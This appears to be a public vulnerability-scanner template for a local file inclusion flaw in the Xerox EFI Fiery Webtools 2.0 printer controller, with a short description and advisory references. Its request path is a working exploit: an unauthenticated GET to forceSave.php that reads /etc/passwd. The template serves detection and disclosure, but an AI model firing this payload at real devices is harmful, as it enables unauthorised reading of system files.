Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
PoC代码[已公开]
id: xerox-efi-lfi
info:
name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
author: gy741
severity: high
description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
- https://packetstormsecurity.com/files/145570
- https://www.exploit-db.com/exploits/43398/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: iot,xerox,disclosure,lfi,packetstorm,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022008b9dccf6e67985cec74f961c27f480bde6e053f6211d3db7e8f94098a6fc77802203fe2f5b8cdd9f5b228d9f535c6386a68a2db3dd0a57e83f509c6b2860169eb9b:922c64590222798bb761d5b6d8e72950